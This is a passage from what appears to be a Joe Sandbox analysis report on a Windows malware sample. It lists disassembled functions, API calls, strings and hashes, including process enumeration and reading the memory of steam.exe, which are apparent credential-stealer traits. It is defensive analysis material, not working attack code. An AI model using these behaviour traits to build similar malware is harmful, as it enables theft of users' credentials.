                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1962333139.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: Time$File$PointerSystem$LocalUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                • API String ID: 3240274019-0
                                                                                                                                                                                                                                                                                • Opcode ID: bbcc28ab56e80f32c9f7ab3c82fd0820beba7326b7d26195747d188f513748ab
                                                                                                                                                                                                                                                                                • Instruction ID: 199ab82a49c152330d2498684869e6748a8235d6c4fc3d2a3f6766ec5b303acd
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bbcc28ab56e80f32c9f7ab3c82fd0820beba7326b7d26195747d188f513748ab
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E8410EB1904705AED324CF25C845B7BBBE8FF84348F108A2EF5D69A291E774E486CB14
                                                                                                                                                                                                                                                                                Function 00410920 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 38memorytimeCOMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(?,?,Version: ,0042150A,?,?,?,?,?,?,?,?,?,?,00417920,?), ref: 0041092D
                                                                                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,?,?,?,?,00417920,?,?), ref: 0041093B
                                                                                                                                                                                                                                                                                • GetLocalTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00417920,?,?,?,?), ref: 00410942
                                                                                                                                                                                                                                                                                • wsprintfA.USER32 ref: 00410971
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961195294.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961240240.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961273700.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1962333139.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: Heap$AllocLocalProcessTimewsprintf
                                                                                                                                                                                                                                                                                • String ID: %d/%d/%d %d:%d:%d
                                                                                                                                                                                                                                                                                • API String ID: 1243822799-1073349071
                                                                                                                                                                                                                                                                                • Opcode ID: b2c1e16d8c03991da878c3dd388cb4621876e2a5b3eb0db676d70254b9559b3a
                                                                                                                                                                                                                                                                                • Instruction ID: a51e7d71a8269122c591f01167c988a4a4a74b4f43d1a07cc1a506d8f3a3d197
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b2c1e16d8c03991da878c3dd388cb4621876e2a5b3eb0db676d70254b9559b3a
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0CF0E9619042207BE300175ADC49D3BB7ECEFC5B66F00450AF9C8861C0E2755C60C3F1
                                                                                                                                                                                                                                                                                Function 0040F780 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 98COMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                  • Part of subcall function 00402400: memmove.MSVCRT(00000000,?,?,?,-00000001,77735E70,00000000,0040D14C,?,00000000), ref: 0040246E
                                                                                                                                                                                                                                                                                • memchr.MSVCRT ref: 0040F7F6
                                                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000,FFFFFFFF,ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-_.,00000041,?,?,?,?,?,?,?,00000000), ref: 0040F870
                                                                                                                                                                                                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,00000000,FFFFFFFF,ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-_.,00000041,?,?,?,?,?,?,?,00000000), ref: 0040F884
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                • ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-_., xrefs: 0040F7A8
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961195294.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961240240.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961273700.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1962333139.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: ??3@_invalid_parameter_noinfo_noreturnmemchrmemmove
                                                                                                                                                                                                                                                                                • String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-_.
                                                                                                                                                                                                                                                                                • API String ID: 1808541760-3714209346
                                                                                                                                                                                                                                                                                • Opcode ID: 2e741561981e289a51148b6f99af6e0fc96081143b174a70ad3d1b80647f697e
                                                                                                                                                                                                                                                                                • Instruction ID: e5761b3670b8c8960a25c8c0341e9f71b1cf11a4bb1c116d5b70eba03c88b707
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2e741561981e289a51148b6f99af6e0fc96081143b174a70ad3d1b80647f697e
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9931E4326043014BD734EE28998476BB6E5EF81314F54493EF8926B7C2D378DC48879A
                                                                                                                                                                                                                                                                                Function 00412C40 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961195294.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961240240.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961273700.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1962333139.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: strtok_s
                                                                                                                                                                                                                                                                                • String ID: |
                                                                                                                                                                                                                                                                                • API String ID: 3330995566-2343686810
                                                                                                                                                                                                                                                                                • Opcode ID: bc2c58b9c6c1bfbc32daa91625234a30c7c08b101eb4f4c09a5ba0343b8f98f7
                                                                                                                                                                                                                                                                                • Instruction ID: 7cbb43b9c3c311997e94ccc4c59da73614e136a49788afc63ea09a6e546b0ca8
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bc2c58b9c6c1bfbc32daa91625234a30c7c08b101eb4f4c09a5ba0343b8f98f7
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F721D7741403099BD734DB21ED44BAB7365FB80308F04891ED91647741E77DE9AAC6A5
                                                                                                                                                                                                                                                                                Function 00410050 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 51stringCOMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                  • Part of subcall function 00411ED0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00411EE5
                                                                                                                                                                                                                                                                                  • Part of subcall function 00411ED0: Process32First.KERNEL32(00000000,?), ref: 00411EF1
                                                                                                                                                                                                                                                                                  • Part of subcall function 00411ED0: Process32Next.KERNEL32(00000000,?), ref: 00411F12
                                                                                                                                                                                                                                                                                  • Part of subcall function 00411ED0: StrCmpCA.SHLWAPI(?,?), ref: 00411F1E
                                                                                                                                                                                                                                                                                  • Part of subcall function 0040FD50: ??_U@YAPAXI@Z.MSVCRT(00064000), ref: 0040FD6D
                                                                                                                                                                                                                                                                                  • Part of subcall function 0040FD50: OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 0040FD94
                                                                                                                                                                                                                                                                                  • Part of subcall function 0040FD50: memset.MSVCRT ref: 0040FDB3
                                                                                                                                                                                                                                                                                  • Part of subcall function 0040FD50: ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000000), ref: 0040FDF1
                                                                                                                                                                                                                                                                                  • Part of subcall function 0040FD50: ReadProcessMemory.KERNEL32(00000000,00000000,?,00000208,00000000,00000000,65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73,-00000208,?,FFFFFFFF,00000FFF,?,?), ref: 0040FE56
                                                                                                                                                                                                                                                                                  • Part of subcall function 0040FD50: strlen.MSVCRT ref: 0040FE67
                                                                                                                                                                                                                                                                                • ??_U@YAPAXI@Z.MSVCRT(?,?,00000000,steam.exe), ref: 00410070
                                                                                                                                                                                                                                                                                • strcpy.MSVCRT(00000000,?,steam.exe), ref: 00410089
                                                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,steam.exe), ref: 004100BF
                                                                                                                                                                                                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,steam.exe), ref: 004100D1
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961195294.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961240240.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961273700.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1962333139.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: ??3@ProcessProcess32$CreateFirstMemoryNextOpenReadSnapshotToolhelp32_invalid_parameter_noinfo_noreturnmemsetstrcpystrlen
                                                                                                                                                                                                                                                                                • String ID: steam.exe
                                                                                                                                                                                                                                                                                • API String ID: 3498801153-2826358650
                                                                                                                                                                                                                                                                                • Opcode ID: edf7ab5e709519ca9690a9e51a5b00c792588e82c5ef7c00e0374f79e830f1f4
                                                                                                                                                                                                                                                                                • Instruction ID: c95efb34c5d0572b28db4c51e5027ad35194888a113b08cfb57a14cf0263e5e6
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: edf7ab5e709519ca9690a9e51a5b00c792588e82c5ef7c00e0374f79e830f1f4
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F4F0F9B1A003082BEA10753A7CC5AFB7948DA55758F040537FD5597342F59B8CD402BA
                                                                                                                                                                                                                                                                                Function 0041D710 Relevance: 6.1, APIs: 4, Instructions: 82timeCOMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                • GetLocalTime.KERNEL32(?), ref: 0041D784
                                                                                                                                                                                                                                                                                • SystemTimeToFileTime.KERNEL32(?,?), ref: 0041D78E
                                                                                                                                                                                                                                                                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 0041D7A9
                                                                                                                                                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041D80E
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961195294.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961240240.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961273700.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1962333139.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: Time$FileSystem$LocalUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                • API String ID: 568878067-0
                                                                                                                                                                                                                                                                                • Opcode ID: 75b2103738ecdde49953f6b06e7d75b5bbde3c112b22eec6627f6643067b6ab9
                                                                                                                                                                                                                                                                                • Instruction ID: 931dc2256524a03f6c6b52008fe1b6fe3cfd9aca74429015198684bf78445e10
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 75b2103738ecdde49953f6b06e7d75b5bbde3c112b22eec6627f6643067b6ab9
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A0318BB2904B109AE329CF29C8547B7BBE4FF84340F008A2EF5D69A250E779E485DB55
                                                                                                                                                                                                                                                                                Function 004113B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 69stringtimeCOMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                  • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                • GetSystemTime.KERNEL32(?,ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890,0042150A), ref: 004113D8
                                                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0042150A), ref: 0041143E
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                • ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890, xrefs: 004113C9
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961195294.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961240240.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961273700.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1962333139.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
